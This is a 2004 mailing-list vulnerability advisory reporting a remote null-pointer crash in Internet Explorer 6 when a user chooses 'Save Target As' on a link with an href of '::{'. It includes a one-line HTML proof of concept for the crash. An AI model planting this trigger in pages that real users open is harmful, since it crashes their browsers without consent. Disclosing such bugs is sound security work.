[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <001101c45255$6dde00a0$aa41b350@fucku>
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: Internet Explorer Remote Null Pointer Crash(mshtml.dll)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2800.1106.xpclnt_qfe.021108-2107
Patched With: SP1;Q832894;Q330994;Q837009;Q831167;
ModName: mshtml.dll
ModVer: 6.0.2734.1600
Platforms: Windows
Bug: Remote/Local Null Pointer Crash
Exploitation: Remote with browser
Date: 14 Jun 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Internet Explorer is currently the most common internet browser in the
world.
It comes by default with every windows operating system. Therefore any
vulnerability
concerning it is an highly important issue.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Upon clicking "Save As" on a link with double colon --> "::"
and
a left curly bracket --> "{"
then
Internet Explorer Will Crash.
AppName: iexplore.exe AppVer: 6.0.2600.0 ModName: ntdll.dll
ModVer: 5.1.2600.114 Offset: 00056074
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Paste into an htm/html file:
<center><a href=::%7b>Right Click aOn Me And Click "Save Target As"</a>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
Powered by blists - more mailing lists